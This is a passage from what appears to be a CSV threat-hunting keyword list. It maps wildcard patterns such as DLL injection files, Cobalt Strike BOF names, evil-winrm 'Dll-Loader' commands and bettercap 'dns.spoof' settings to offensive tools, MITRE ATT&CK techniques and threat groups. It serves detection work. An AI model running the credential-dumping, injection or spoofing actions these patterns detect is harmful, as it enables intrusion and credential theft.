Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*DLL_Imports_BOF*,offensive_tool_keyword,cobaltstrike,A BOF to parse the imports of a provided PE-file. optionally extracting symbols on a per-dll basis.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL_Imports_BOF,1,1,N/A,10,10,80,10,2021-10-28T18:07:09Z,2021-10-27T21:02:44Z -*dll_inject.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*dll_spawn_cmd.cpp*,offensive_tool_keyword,DirCreate2System,Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting,T1068 - T1059.001 - T1070.004,TA0003 - TA0002 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/binderlabs/DirCreate2System,1,1,N/A,8,4,332,38,2022-12-19T17:00:43Z,2022-12-15T03:49:55Z -*DLL_TO_HIJACK_WIN10*,offensive_tool_keyword,cobaltstrike,A faithful transposition of the key features/functionality of @itm4n's PPLDump project as a BOF.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/PPLDump_BOF,1,1,N/A,10,10,131,24,2021-09-24T07:10:04Z,2021-09-24T07:05:59Z -*DllCanUnloadNow*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,0,private github repo,10,,N/A,,, -*dllexploit.*,offensive_tool_keyword,ppldump,Dump the memory of a PPL with a userland exploit,T1003 - T1055 - T1078 - T1112 - T1553 - T1555,TA0001 - TA0002 - TA0003 - TA0005 - TA0011,N/A,N/A,Credential Access,https://github.com/itm4n/PPLdump,1,1,N/A,N/A,8,774,137,2022-07-24T14:03:14Z,2021-04-07T13:12:47Z -*DllExport -*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*DLLHijackAuditKit*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DLLHijackAuditKit.zip*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*DLL-Hijack-Search-Order-BOF*,offensive_tool_keyword,cobaltstrike,DLL Hijack Search Order Enumeration BOF,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EspressoCake/DLL-Hijack-Search-Order-BOF,1,1,N/A,10,10,125,21,2021-11-03T17:39:32Z,2021-11-02T03:47:31Z -*dllinject *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*dllinject.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*-DllInjection.ps1*,offensive_tool_keyword,empire,Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1138,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*dllKitten.dll*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,1,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*DllLdr.x64.bin*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*dllload *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*Dll-Loader -http -path *,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Dll-Loader -local -path*,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*Dll-Loader -smb -path *,offensive_tool_keyword,evil-winrm,This shell is the ultimate WinRM shell for hacking/pentesting.WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985). of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase. The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.,T1021.006 - T1059.001 - T1059.003 - T1047,TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/Hackplayers/evil-winrm,1,0,N/A,10,10,3760,566,2023-06-09T07:42:42Z,2019-05-28T10:53:00Z -*DllLoaderLoader.exe*,offensive_tool_keyword,Ebowla,Framework for Making Environmental Keyed Payloads,T1027.002 - T1059.003 - T1140,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Genetic-Malware/Ebowla,1,1,N/A,10,8,710,179,2019-01-28T10:45:15Z,2016-04-07T22:29:58Z -*-DllName *-Module *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -*DllNotificationInjection.cpp*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.exe*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.sln*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection.vcxproj*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*DllNotificationInjection-master*,offensive_tool_keyword,DllNotificationInjection,A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.,T1055.011 - T1055.001,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/ShorSec/DllNotificationInjection,1,1,N/A,10,4,319,56,2023-08-23T13:50:27Z,2023-08-14T11:22:30Z -*dllproxy.py*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*DllProxy-main*,offensive_tool_keyword,DllProxy,Proxy your dll exports and add some spicy content at the same time,T1574.002 - T1036.005,TA0005 - TA0004,N/A,N/A,Exploitation Tools,https://github.com/Iansus/DllProxy/,1,1,N/A,N/A,1,16,5,2023-06-28T14:19:36Z,2021-05-04T19:38:42Z -*dllsearcher *.dll*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*dmcxblue/SharpBlackout*,offensive_tool_keyword,SharpBlackout,Terminate AV/EDR leveraging BYOVD attack,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/dmcxblue/SharpBlackout,1,1,N/A,10,1,68,16,2023-08-23T14:44:25Z,2023-08-23T14:16:40Z -*dmFsaWRfdXNlckBjb250b3NvLmNvbTpQYXNzd29yZDE*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*dmg2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*DNet-EnumerateAllDomainUserAccounts*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListAccountsByDescription*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListDomainUserAccountsWithCompletedADDescription*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*DNet-ListUsersInDomainAdminsGroup*,offensive_tool_keyword,SlinkyCat,This script performs a series of AD enumeration tasks,T1087.002 - T1018 - T1069.002,TA0007 - TA0009,N/A,N/A,AD Enumeration,https://github.com/LaresLLC/SlinkyCat,1,0,N/A,N/A,1,70,3,2023-07-12T15:29:31Z,2023-07-03T23:44:18Z -*dnf install tor -y*,offensive_tool_keyword,torproject,Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.,T1090 - T1134 - T1188 - T1307 - T1497 - T1560,TA0001 - TA0002 - TA0005 - TA0011,N/A,N/A,Data Exfiltration,torproject.org,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*dns.spoof on*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,0,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.address*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.all*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.domains*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns.spoof.hosts*,offensive_tool_keyword,bettercap,The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.,T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048,TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010,N/A,N/A,Network Exploitation tools,https://github.com/bettercap/bettercap,1,1,N/A,N/A,10,14623,1372,2023-09-18T15:43:34Z,2018-01-07T15:30:41Z -*dns_beacon_beacon*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/random_c2_profile,1,1,N/A,10,10,544,83,2023-01-05T21:17:00Z,2021-04-03T20:39:29Z -*dns_beacon_dns_idle*,offensive_tool_keyword,cobaltstrike,Cobalt Strike random C2 Profile generator,T1548.002 - T1548.003 